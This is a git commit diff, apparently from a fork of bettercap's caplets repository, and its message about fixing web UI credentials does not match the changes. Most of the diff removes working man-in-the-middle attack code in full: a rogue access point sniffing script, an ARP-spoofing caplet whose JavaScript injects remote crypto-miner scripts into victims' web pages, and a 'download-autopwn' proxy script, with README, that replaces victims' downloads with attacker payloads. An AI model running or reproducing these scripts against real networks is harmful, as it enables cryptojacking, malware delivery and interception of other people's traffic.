fix: update wrongful interface username and password for bettercap web ui panel and change to shikigotchi instead

Makefile

@@ -1,4 +1,4 @@
 install:
 	@mkdir -p /usr/local/share/bettercap/caplets
 	@cp -rf * /usr/local/share/bettercap/caplets/
-	@cp *.* /usr/local/share/bettercap/caplets/
+	@cp *.cap /usr/local/share/bettercap/caplets/

ap.cap

@@ -1,24 +0,0 @@
-# interface to use to create the AP
-set wifi.ap.interface wlx00c0ca96e4b2
-# interface for upstream connectivity, comment to disable
-set wifi.ap.upstream wlp1s0
-# comment to create a free access point
-set wifi.ap.passphrase 12345678
-
-# enable the ap
-wifi.ap on
-
-# wait 2 seconds then set the session interface to the AP one
-sleep 2
-iface wlx00c0ca96e4b2
-
-set net.sniff.local true
-set net.sniff.verbose false
-set net.sniff.filter not arp and not udp port 53
-
-# start recon for clients
-net.recon on
-# sniff
-net.sniff on
-# run the https-ui caplet because it's cool
-https-ui

crypto-miner/crypto-miner.cap

@@ -1,27 +0,0 @@
-# this module lets you inject a javascript crypto miner
-#
-# targeting the whole subnet by default, to make it selective:
-#
-#   sudo ./bettercap -caplet crypto-miner.cap -eval "set arp.spoof.targets 192.168.1.64"
-
-
-# set the name of the Miner: coinhive, cryptoloot or coinimp
-set cryptominer.name coinhive
-
-# set the key of the Miner
-set cryptominer.key 123456789
-
-# inject js miner
-set http.proxy.script crypto-miner.js
-
-# uncomment if you want sslstrip enabled
-#set http.proxy.sslstrip true
-
-# redirect http traffic to a proxy
-http.proxy on
-
-# wait for everything to start properly
-sleep 1
-
-# make sure probing is off as it conflicts with arp spoofing
-arp.spoof on

crypto-miner/crypto-miner.js

@@ -1,40 +0,0 @@
-var green   = "\033[32m",
-    reset   = "\033[0m"
-
-function onLoad() {
-    logStr = "Javascript Crypto Miner loaded.\n" +
-             "\n    Miner: " + green + env["cryptominer.name"].charAt(0).toUpperCase() + env["cryptominer.name"].slice(1) + reset +
-             "\n    Targets: " + green + env["arp.spoof.targets"] + reset + "\n"
-    log(logStr);
-}
-
-function onResponse(req, res) {
-    if( res.ContentType.indexOf('text/html') == 0 ){
-        var body = res.ReadBody();
-        if( body.indexOf('</head>') != -1 ) {
-            switch(env["cryptominer.name"]) {
-                case "coinhive":
-                    res.Body = body.replace( 
-                        '</head>', 
-                        '<script type="text/javascript" src="https://coinhive.com/lib/coinhive.min.js"></script>',
-                        '<script> var miner = new CoinHive.Anonymous(' + env["cryptominer.key"] + '); miner.start(); </script></head>'
-                    );
-                    break;
-                case "cryptoloot":
-                    res.Body = body.replace( 
-                        '</head>', 
-                        '<script type="text/javascript" src="https://crypto-loot.com/lib/miner.min.js"></script>',
-                        '<script> var miner = new CryptoLoot.Anonymous(' + env["cryptominer.key"] + '); miner.start(); </script></head>'
-                    );
-                    break;
-                case "coinimp":
-                    res.Body = body.replace( 
-                        '</head>', 
-                        '<script type="text/javascript" src="https://www.freecontent.date./tSPw.js"></script>',
-                        '<script> var miner = new Client.Anonymous(' + env["cryptominer.key"] + '); miner.start(); </script></head>'
-                    );
-                    break;
-            }
-        }
-    }
-}

download-autopwn/README.md

@@ -1,185 +0,0 @@
-<p align="center"><img height="142px" src="https://cdn.rawgit.com/yungtravla/cdn/a5ec3cd7/github.com/bettercap/caplets/download-autopwn/dap.svg" /></p>
-
-
-### caplets/download-autopwn.cap
-
-Everything is configurable in the **download-autopwn.cap** file.
-
-```sh
-# documentation can be found at https://github.com/bettercap/caplets/blob/master/download-autopwn/README.md
-# 
-# this module lets you intercept very specific download requests and replaces the payload with one of your choice
-#
-# in order for a download to get intercepted:
-#    1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value
-#    2. the requested file must match one of the downloadautopwn.extensions.x file extensions
-#
-# you can find the downloadautopwn.devices in the caplets/download-autopwn/ folder (you can add your own)
-#
-
-# choose the devices from which downloads get pwned (enter the dir names of choice from caplets/download-autopwn/)
-# (or feel free to add your own)
-set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox
-
-# choose the regexp value that the victim's User-Agent has to match
-# (feel free to add your own)
-set downloadautopwn.useragent.android  Android
-set downloadautopwn.useragent.ios      iPad|iPhone|iPod
-set downloadautopwn.useragent.linux    Linux
-set downloadautopwn.useragent.macos    Intel Mac OS X 10_
-set downloadautopwn.useragent.ps4      PlayStation 4
-set downloadautopwn.useragent.windows  Windows|WOW64
-set downloadautopwn.useragent.xbox     Xbox
-
-# choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in caplets/download-autopwn/.../)
-# (again, you can add as many as you want)
-# make sure the payload files exist and that they are all named "payload" (for example: payload.exe)
-set downloadautopwn.extensions.android  apk,pdf,sh,pfx,zip
-set downloadautopwn.extensions.ios      ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip
-set downloadautopwn.extensions.linux    c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip
-set downloadautopwn.extensions.macos    app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip
-set downloadautopwn.extensions.ps4      disc,pup,pdf,doc,docx,zip
-set downloadautopwn.extensions.windows  exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip
-set downloadautopwn.extensions.xbox     exe,msi,jar,pdf,doc,docx,zip
-
-# choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false)
-set downloadautopwn.resizepayloads true
-
-# set download-autopwn.js as proxy script
-set http.proxy.script caplets/download-autopwn.js
-# uncomment if you want sslstrip enabled
-# set http.proxy.sslstrip true
-# start proxy
-http.proxy on
-
-# wait for everything to start properly
-sleep 1
-
-# uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing)
-# arp.spoof on
-```
-
-<br>
-
-The `downloadautopwn.devices` variable accepts comma separated values. 
-<br>
-These values are the folder names inside the **caplets/download-autopwn/** directory.
-
-<br>
-
-The `downloadautopwn.useragent.x` variables accept a regular expression value (where `x` is the device name).
-<br>
-The victim's User-Agent string has to match this regex value.
-
-<br>
-
-The `downloadautopwn.extensions.x` variables accept comma separated file extensions that are present in the device's folder (where `x` is the device name).
-<br>
-These files must be present in the device's folder, and they must be called `payload` (for example: `payload.exe`).
-
-<br>
-
-The `downloadautopwn.resizepayloads` variable accepts a boolean value (default=false).
-<br>
-If this value is set to true, your payloads will be resized to match the requested file's size (unless your payload is bigger or equal to the requested file's size).
-
-<br>
-
-### caplets/download-autopwn.js
-
-No changes should have to be made in the **download-autopwn.js** file.
-
-```javascript
-var targets = {}
-
-var nullbyte = "\u0000"
-
-var green   = "\033[32m",
-    boldRed = "\033[1;31m",
-    onRed   = "\033[41m",
-    reset   = "\033[0m",
-    redLine = "\n  " + onRed + " " + reset
-
-function onLoad() {
-	devices = env("downloadautopwn.devices").split(",")
-	logStr = ""
-	for (var i = 0; i < devices.length; i++) {
-		item = {
-			"device": devices[i],
-			"useragent": env("downloadautopwn.useragent." + devices[i]),
-			"extensions": env("downloadautopwn.extensions." + devices[i]).toLowerCase().split(",")
-		}
-		targets[i] = item
-		logStr += "\n  " + green + targets[i]["device"] + reset +
-		          "\n    User-Agent: " + targets[i]["useragent"] + 
-		          "\n    Extensions: " + targets[i]["extensions"] + "\n"
-	}
-	log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr)
-}
-
-function onResponse(req, res) {
-	// First of all check whether the requested path might have an extension (to save cpu)
-	var requestedFileName = req.Path.replace(/.*\//g, "")
-	if ( requestedFileName.indexOf(".") != -1 ) {
-		var userAgent = req.GetHeader("User-Agent", ""),
-		    extension,
-		    headerCount = req.Headers.length
-		// Iterate through targets
-		for ( var t = 0; t < Object.keys(targets).length; t++ ) {
-			// Check if User-Agent is a target
-			regex = new RegExp(targets[t]["useragent"])
-			if ( userAgent.match(regex) ) {
-				// Iterate through target extensions
-				for (var e = 0; e < targets[t]["extensions"].length; e++) {
-					// Check if requested path contains a targeted extension
-					// function endsWith() could be a nice simplification here
-					if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) {
-						extension = targets[t]["extensions"][e]
-						// Autopwn
-						logStr = "\n" + redLine + "  Autopwning download request from " + boldRed + req.Client.IP + reset + 
-						         redLine + 
-						         redLine + "  Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + 
-						         redLine + 
-						         redLine + "  Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..."
-						// Check requested file size
-						requestedFile = res.ReadBody()
-						requestedFileSize = requestedFile.length
-						payload = readFile("/usr/local/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension)
-						payloadSize = payload.length
-						logStr += redLine + "  The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes" + 
-						          redLine + "  The raw size of your payload is " + boldRed + payloadSize + reset + " bytes" + redLine
-						// Append nullbytes to payload if resizing is enabled and if requested file is larger than payload
-						if ( env("downloadautopwn.resizepayloads") == "true" && requestedFileSize > payloadSize ) {
-							logStr += redLine + "  Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..."
-							sizeDifference = requestedFileSize - payloadSize
-							nullbyteString = Array(sizeDifference + 1).join(nullbyte)
-							payload += nullbyteString
-						}
-						// Set Content-Disposition header to enforce file download instead of in-browser preview
-						res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"")
-						// Update Content-Length header in case our payload is larger than the requested file
-						res.SetHeader("Content-Length", payload.length)
-						logStr += redLine + "  Serving your payload to " + boldRed + req.Client.IP + reset + "...\n"
-						log(logStr)
-						res.Body = payload
-					}
-				}
-			}
-		}
-	}
-}
-```
-
-<br>
-
-### Now you're all set to pwn!
-
-#### What it looks like when you have configured a crazy amount of payloads
-
-![screenshot 1](https://user-images.githubusercontent.com/29265684/37411166-e3796c46-27ed-11e8-94da-8e1c226a0dd3.png)
-
-#### What it looks like when you pwn someone's download >:-)
-
-![screenshot 2](https://user-images.githubusercontent.com/29265684/37409382-f6bb143e-27e9-11e8-86c5-c1c556900556.png)
-
-Have fun!

download-autopwn/download-autopwn.cap

@@ -1,51 +0,0 @@
-# documentation can be found at https://github.com/bettercap/blob/master/download-autopwn/README.md
-# 
-# this module lets you intercept very specific download requests and replaces the payload with one of your choice
-#
-# in order for a download to get intercepted:
-#    1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value
-#    2. the requested file must match one of the downloadautopwn.extensions.x file extensions
-#
-# you can find the downloadautopwn.devices in the download-autopwn/ folder (you can add your own)
-#
-
-# choose the devices from which downloads get pwned (enter the dir names of choice from download-autopwn/)
-# (or feel free to add your own)
-set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox
-
-# choose the regexp value that the victim's User-Agent has to match
-# (feel free to add your own)
-set downloadautopwn.useragent.android  Android
-set downloadautopwn.useragent.ios      iPad|iPhone|iPod
-set downloadautopwn.useragent.linux    Linux
-set downloadautopwn.useragent.macos    Intel Mac OS X 10_
-set downloadautopwn.useragent.ps4      PlayStation 4
-set downloadautopwn.useragent.windows  Windows|WOW64
-set downloadautopwn.useragent.xbox     Xbox
-
-# choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in download-autopwn/.../)
-# (again, you can add as many as you want)
-# make sure the payload files exist and that they are all named "payload" (for example: payload.exe)
-set downloadautopwn.extensions.android  apk,pdf,sh,pfx,zip
-set downloadautopwn.extensions.ios      ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip
-set downloadautopwn.extensions.linux    c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip
-set downloadautopwn.extensions.macos    app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip
-set downloadautopwn.extensions.ps4      disc,pup,pdf,doc,docx,zip
-set downloadautopwn.extensions.windows  exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip
-set downloadautopwn.extensions.xbox     exe,msi,jar,pdf,doc,docx,zip
-
-# choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false)
-set downloadautopwn.resizepayloads true
-
-# set download-autopwn.js as proxy script
-set http.proxy.script download-autopwn.js
-# uncomment if you want sslstrip enabled
-# set http.proxy.sslstrip true
-# start proxy
-http.proxy on
-
-# wait for everything to start properly
-sleep 1
-
-# uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing)
-# arp.spoof on

download-autopwn/download-autopwn.js

@@ -1,84 +0,0 @@
-var targets = {}
-
-var nullbyte = "\u0000"
-
-var green   = "\033[32m",
-    boldRed = "\033[1;31m",
-    onRed   = "\033[41m",
-    reset   = "\033[0m",
-    redLine = "\n  " + onRed + " " + reset
-
-function onLoad() {
-	devices = env["downloadautopwn.devices"].split(",")
-	logStr = ""
-	for (var i = 0; i < devices.length; i++) {
-		item = {
-			"device": devices[i],
-			"useragent": env[ "downloadautopwn.useragent." + devices[i] ],
-			"extensions": env[ "downloadautopwn.extensions." + devices[i] ].toLowerCase().split(",")
-		}
-		targets[i] = item
-		logStr += "\n  " + green + targets[i]["device"] + reset +
-		          "\n    User-Agent: " + targets[i]["useragent"] + 
-		          "\n    Extensions: " + targets[i]["extensions"] + "\n"
-	}
-	log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr)
-}
-
-function onResponse(req, res) {
-	// First of all check whether the requested path might have an extension (to save cpu)
-	var requestedFileName = req.Path.replace(/.*\//g, "")
-	if ( requestedFileName.indexOf(".") != -1 ) {
-		var userAgent = req.GetHeader("User-Agent", ""),
-		    extension
-		// Iterate through targets
-		for ( var t = 0; t < Object.keys(targets).length; t++ ) {
-			// Check if User-Agent is a target
-			regex = new RegExp(targets[t]["useragent"])
-			if ( userAgent.match(regex) ) {
-				// Iterate through target extensions
-				for (var e = 0; e < targets[t]["extensions"].length; e++) {
-					// Check if requested path contains a targeted extension
-					// function endsWith() could be a nice simplification here
-					if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) {
-						extension = targets[t]["extensions"][e]
-						// Autopwn
-						logStr = "\n" + redLine + "  Autopwning download request from " + boldRed + req.Client.IP + reset + 
-						         redLine + 
-						         redLine + "  Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + 
-						         redLine + 
-						         redLine + "  Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..."
-						// Check our payload size
-						payload = readFile("/usr/local/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension)
-						payloadSize = payload.length
-						logStr += redLine + "  The raw size of your payload is " + boldRed + payloadSize + reset + " bytes"
-						// Append nullbytes to payload if resizing is enabled and if requested file is larger than payload
-						if ( env["downloadautopwn.resizepayloads"] == "true" ) {
-							// Check requested file size
-							requestedFileSize = parseInt(res.GetHeader("Content-Length", "0"))
-							if (requestedFileSize == 0) {
-								requestedFileSize = res.ReadBody().length
-							}
-							logStr += redLine + "  The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes"
-							// Append nullbytes if required
-							if (requestedFileSize > payloadSize) {
-								logStr += redLine + "  Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..."
-								sizeDifference = requestedFileSize - payloadSize
-								nullbyteString = Array(sizeDifference + 1).join(nullbyte)
-								payload += nullbyteString
-							}
-						}
-						// Set Content-Disposition header to enforce file download instead of in-browser preview
-						res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"")
-						// Update Content-Length header
-						res.RemoveHeader("Content-Length")
-						logStr += redLine + 
-						          redLine + "  Serving your payload to " + boldRed + req.Client.IP + reset + "...\n"
-						log(logStr)
-						res.Body = payload
-					}
-				}
-			}
-		}
-	}
-}